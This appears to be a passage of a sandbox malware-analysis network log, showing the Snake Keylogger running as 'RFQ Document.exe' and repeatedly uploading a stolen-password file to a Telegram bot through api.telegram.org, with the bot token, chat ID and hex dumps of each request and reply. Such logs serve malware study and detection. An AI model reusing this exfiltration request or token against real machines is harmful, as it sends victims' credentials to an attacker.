                                            2021-09-28 05:58:44 UTC177INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12694,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            111192.168.2.449887149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC177OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d04cbcff
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC178OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 34 63 62 63 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d04cbcffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:45 UTC178INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:45 UTC178INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12695,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808725,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            112192.168.2.449888149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:45 UTC179OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d06494a7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:45 UTC179OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 36 34 39 34 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d06494a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:53 UTC180INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:53 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 3
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:53 UTC180INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            113192.168.2.449910149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:53 UTC180OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d53ebc56
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:53 UTC180OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 35 33 65 62 63 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d53ebc56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:56 UTC181INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:56 UTC181INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12697,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            114192.168.2.449913149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:56 UTC182OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d719308d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:56 UTC182OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 31 39 33 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d719308dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:56 UTC182INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:56 UTC183INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12699,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            115192.168.2.449914149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:56 UTC183OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d735cde8
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:56 UTC184OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 33 35 63 64 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d735cde8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:56 UTC184INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:56 UTC184INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12700,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            116192.168.2.449915149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:56 UTC185OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d754caca
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:56 UTC185OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 35 34 63 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d754cacaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:56 UTC186INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:56 UTC186INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12701,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            117192.168.2.449916149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:56 UTC186OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d76ca2a1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:56 UTC187OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 36 63 61 32 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d76ca2a1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:56 UTC187INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:56 UTC188INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12702,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808736,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            118192.168.2.449917149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:57 UTC188OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d7821822
                                            Host: api.telegram.org
                                            Content-Length: 407
